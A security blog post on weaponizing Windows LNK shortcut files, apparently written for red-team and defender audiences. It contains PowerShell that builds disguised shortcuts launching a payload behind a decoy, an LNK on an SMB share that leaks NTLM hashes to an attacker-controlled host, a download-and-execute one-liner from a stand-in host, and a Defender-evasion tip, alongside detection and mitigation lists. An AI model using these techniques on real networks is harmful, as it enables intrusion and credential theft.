top of page
Search

Weaponizing LNK Files in Offensive Operations

  • viktor667
  • Jun 19
  • 4 min read

LNK files are Windows shortcut files designed to provide access to applications, files, or folders. Desktop shortcuts of browsers, or any other program, are basically LNK files polished with the appropriate icons (e.g. the Firefox icon of the Firefox Desktop shortcut). In their core, they are files with a set of instructions for the OS to execute: where the shortcut icon is stored, where the actual program executable is located, if there are any arguments to pass on etc. Although created for benign use and UX ease, those features can be abused.


For attackers, LNK files are a powerful tool for executing code and credential theft, allowing them to gain access and move laterally into the network. They are dangerous because:


  • They can execute commands without user interaction in some contexts (e.g., icon loading).

  • They can be made to look like documents (Invoice.pdf.lnk) with convincing icons.

  • They are part of the native Windows functionality, i.e. no macro warnings, no scripting.


There have been numerous campaigns during the past year by APTs, where the attackers utilized LNK files:


  1. North Korean APT delivered an LNK file that was used to further download an execute malware on the target machine (Source)

  2. Suspected Asian APT delivered an LNK file that created a scheduled task on the target machine to pull down further payloads (Source)


In this article we'll explore some ways an LNK file can be weaponized, both before infection and after getting the initial foothold in the network.


Triggering the infection chain


Modern malware infection techniques such as the above-mentioned examples involve a trigger, which is the initial stage of infection, where the victim clicks on it. This usually triggers two commands: the decoy, which is to convince the victim into believing that they clicked on something benign, and the actual payload which contains the malicious code.

An LNK file can be used as a trigger, since an attacker controls its icon (they can make it look like the filetype of the decoy) and they can make the file execute OS commands, upon opening it, by creating a shortcut to %COMSPEC%, which is the environment variable of CMD.EXE, and also pass arguments.


$wsh = New-Object -ComObject WScript.Shell
$lnk = $wsh.CreateShortcut("C:\\\\Users\\\\user1\\\\Desktop\\\\report.pdf.lnk")
$lnk.TargetPath = "%COMSPEC%"
$lnk.Arguments = "/C start payload.exe && start decoy.pdf"
$lnk.IconLocation = "C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe,13"
$lnk.Save()

Arguments may also include downloading files needed for the infection, the actual malware, or whatever the campaign needs, with any added obfuscation and AV/EDR evasion.



Detection and Mitigation


Admins should be wary of this behavior. Defenders can look for:


  • LNK files spawning command interpreters or LOLBINs like powershell, CMD, mshta, etc.

  • File creation of suspicious LNK files

  • Identify shortcut files with remote icons


To reduce exposure:


  • Block Windows from resolving LNK icons that point to remote shares (especially over SMB)

  • Block or quarantine LNK files sent via email or within ZIP/RAR attachments

  • Prevent execution of unauthorized programs or scripting engines launched via .LNK files


Harvesting NTLM Hashes in SMB Shares


In internal Active Directory environments where trust relationships and Windows features intersect, we can leverage default behavior to collect NTLM hashes — sometimes even without user interaction. In this technique an LNK file dropped into a shared folder can silently cause domain users and machines to leak NTLM hashes to an attacker-controlled host.


The Scenario


This technique is a post-exploitation technique where one has already access to the AD environment and the ability to receive SMB authentication requests (e.g. with smbserver.py). From that foothold, you identify a writable SMB share used by other users in the organization.


The goal is to make a user or a machine authenticate to the host smbserver.py is running.


The LNK Trick


When Windows Explorer encounters a LNK file, even if the user doesn’t click it, the OS may try to resolve its icon or target path. If these point to a UNC path (e.g., \\\\\\\\attacker\\\\something), Windows will try to authenticate to that server via SMB. If that server is running an SMB service like smbserver.py, the NTLMv2 hash is captured immediately.


Creating the Weaponized Shortcut


The LNK file can be created using PowerShell’s WScript.Shell COM object. Here’s what the logic looks like:


$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("\\\\\\\\WRITEABLE_SMB_SHARE_IP\\\\SHARE\\\\@report.pdf.lnk")
$lnk.TargetPath = "\\\\\\\\CONTROLLED_HOST\\\\@threat.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\\\\system32\\\\shell32.dll, 3"
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

The important part is the TargetPath references a file on the attacker-controlled IP. When the link is viewed, Windows tries to fetch that path. The moment it does, it leaks credentials.


Execution


From your session, or any other shell on the compromised host, you run the PowerShell script:

powershell -Command "& ([ScriptBlock]::Create((New-Object Net.WebClient).DownloadString('https://LNK_DROPPER_ORIGIN/lnkdrop.ps1')))"
🔕 Note: You may be tempted to use -ExecutionPolicy Bypass here, but in my testing, that actually triggered Microsoft Defender. Running the command without that flag succeeded without alerts.

As soon as the LNK file is created in the shared folder, it’s live.


The Payoff


Even before a real user interacts with the file, you’ll often see NTLM hashes in smbserver.py — usually from the compromised machine itself, since it triggers resolution just by copying the file into the share. When a domain user views it in Windows Explorer, you see their NTLMv2 hash sent to your smbserver.py host.


[+] NTLMv2-SSP Hash     : DOMAIN\\\\\\\\User::DOMAIN:112233445566778899...

That hash can then be cracked offline with john or hashcat, or used in pass-the-hash attacks depending on the environment and the version of the NTLM hash.


Why This Works


This technique relies entirely on default Windows behavior. LNK files with UNC paths cause the OS to authenticate to the destination as part of the rendering process. This is used legitimately for network shortcuts and icon paths, but it also creates a quiet credential-leak vector. In many networks, outbound SMB or NTLM authentication to internal systems is allowed — and that's the opening.


Detection and Mitigation


Admins should be wary of this behavior. Defenders can look for:


  • LNK files on shared folders pointing to external or uncommon IPs

  • SMB traffic to internal hosts not normally used for file sharing

  • Outbound NTLM authentication from endpoints to suspicious IPs


To reduce exposure:


  • Block outbound SMB and NTLM where unnecessary

  • Enforce SMB signing and NTLM hardening via GPO

  • Monitor for the creation or use of LNK files in shared folders

 
 

Recent Posts

See All

© 2024 Bitcrack Cyber Security (PTY) Ltd | © 2024 Bitcrack Mozambique LDA | © 2024 Bitcrack Cyber Security Europe P.C.

All rights reserved.

bottom of page